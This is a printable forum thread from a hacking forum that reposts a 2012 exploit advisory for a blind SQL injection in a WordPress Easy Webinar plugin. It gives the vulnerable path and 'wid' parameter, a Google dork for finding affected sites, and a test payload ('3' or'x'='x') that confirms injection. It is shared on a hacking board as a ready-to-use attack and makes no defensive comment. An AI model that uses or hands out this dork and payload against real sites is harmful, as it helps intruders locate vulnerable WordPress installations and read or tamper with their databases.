Sinisterly
Wordpress Easy Webinar Plugin Blind SQL Injection Vulnerability - Printable Version

+- Sinisterly (https://sinister.li)
+-- Forum: Hacking (https://sinister.li/Forum-Hacking)
+--- Forum: Website & Server Hacking (https://sinister.li/Forum-Website-Server-Hacking)
+--- Thread: Wordpress Easy Webinar Plugin Blind SQL Injection Vulnerability (/Thread-Wordpress-Easy-Webinar-Plugin-Blind-SQL-Injection-Vulnerability)



Wordpress Easy Webinar Plugin Blind SQL Injection Vulnerability - Stricker - 10-28-2012

Code:
#ExploitTitle:Wordpress Easy Webinar Plugin Blind SQL Injection Vulnerability #VendorHomepage: www.easywebinarplugin.com #Date:10/26/2012 #Author:RobertCooper(robert.cooper [at]areyousecure.net) #Testedon:[Linux/Windows7] #Vulnerable Parameters:wid= #GoogleDork:allinurl:get- widget.php?wid= ############################################################## Exploit: www.example.com/wp-content/plugins/ webinar_plugin/get-widget.php?wid= [SQLi] Note:The HTTP response will read 404, but this is false: www.example.com/wp-content/plugins/ webinar_plugin/get-widget.php?wid=3' or'x'='x This wil lresult in the page loading correctly and show that the pluginis vulnerable to injection (string). ##############################################################